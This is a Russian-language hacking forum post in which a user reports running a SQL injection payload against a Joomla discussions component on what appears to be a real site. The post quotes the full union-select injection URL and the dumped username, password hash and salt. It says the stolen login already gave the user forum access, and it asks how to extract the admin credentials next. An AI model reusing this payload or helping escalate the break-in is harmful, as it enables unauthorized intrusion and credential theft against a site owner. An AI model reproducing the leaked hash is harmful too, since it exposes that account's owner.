20.06.2012, 15:20
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
С нами:
7523606
Репутация:
0
|
|
Сообщение от попугай
concat_ws(0x3a,username,password)
вместо отдельных jos_users.password и jos_users.username
Огромное спасибо оказывается все чуть попроще можно сделать было. Но сути не поменяло это
Сообщение от None
option=com_discussions&view=thread&catid=14%3Abers erk&thread=1'%20union%20all%20select%20(select%20c oncat_ws(0x3a,username,password)%20from%20`ipenza_ giperion`.jos_users%20Order%20by%20username%20limi t%200,1)%20--+a%200,1)%20--+a
Вот запрос который вы предложили.
Получил я на него следующее:
.Trav.:404d9cea50d28bf697fd5f49fcb12fee:fk2uJkr1H3 qsZ4eIPIBYoQ2j4denG7nM
Хэш тот же самый пароль следовательно такой же и все так же он не подходит в админку
Однако доступ на форум я получил. Следовательно я считаю что пароль и логин этот от учетной записи на форуме. Но в упор не понимаю как вытащить пароль и логин от админки.
|
|
|